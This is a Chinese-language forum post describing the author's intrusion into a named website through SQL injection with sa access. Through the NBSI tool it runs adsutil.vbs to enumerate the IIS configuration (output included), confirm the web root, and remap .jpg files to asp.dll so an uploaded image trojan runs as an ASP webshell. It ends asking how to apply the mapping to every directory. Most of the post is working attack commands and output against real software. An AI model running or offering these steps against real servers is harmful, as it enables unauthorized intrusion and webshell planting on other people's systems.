maomao
我的一次入侵经过:
www.wanbin.com/mm.asp?id=1是注入点,sa登陆 IP为1.1.1.1
http://1.1.1.1/直接返回首页,
adsutil.vbs在入侵的另类妙用
。初步踩点分析为首页为默认的路据库
入侵经过:
在nbsi里执行:
adsutil.vbs ENUM w3svc/1/root 得到默认web的信息
C:\Inetpub\AdminScripts>adsutil.vbs ENUM w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
AccessScript. (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteScript. (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"
DefaultDoc : (STRING) "index.aspx,index.htm,Default.htm,De
ault.asp,iisstart.asp,Default.aspx"
Path : (STRING) "E:\dvbbs"
AccessFlags : (INTEGER) 513
ScriptMaps : (LIST) (2 Items)
".asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD
POST,DEBUG"
[/w3svc/1/root/Scripts]
[/w3svc/1/root/IISHelp]
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/IISAdmin]
[/w3svc/1/root/IISSamples]
[/w3svc/1/root/MSADC]
[/w3svc/1/root/Printers]
[/w3svc/1/root/aspnet_client]
[/w3svc/1/root/bin]
[/w3svc/1/root/Manage]
通过分析,我们找到了他的首页的路径为e:\dvbbs
再测试:
echo linzi is here >e:\dvbbs\1.txt
打开http://1.1.1.1/1.txt成功显示,说明我们对了,
再用echo写入小马,发现过滤了%,因为他是dvbbs,所以我们可以上传图.
再在nbsi里输入:
adsutil.vbs SET W3SVC/1/root/ScriptMaps ".jpg,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
再去上传一张newmm.jpg,上传成功后,newmm.jpg果然和newmm.asp
说明在命令行可以让asp.dll解析jpg.
总结入侵思路:
当我们遇到入侵没有回显的时候,这个时候,我们可以让asp.dll解析jpg,使我们的图片木马和asp木马有同样的功能,
电脑资料
《adsutil.vbs在入侵的另类妙用》(https://www.unjs.com)。当然sa入侵时有更好的办法,但这里我们是思路,是一种技术讨论,所以先不管别的方法。
问题:
但是在入侵的时候,他的默认目录可能并没有启动,当然我们可以用
adsutil.vbs START_SERVER W3SVC/1来启动
但是我们能不能让所有的目录都用asp.dll解析jpg,dos下用通配符,但是我试了半天都没成功,所以和大家讨论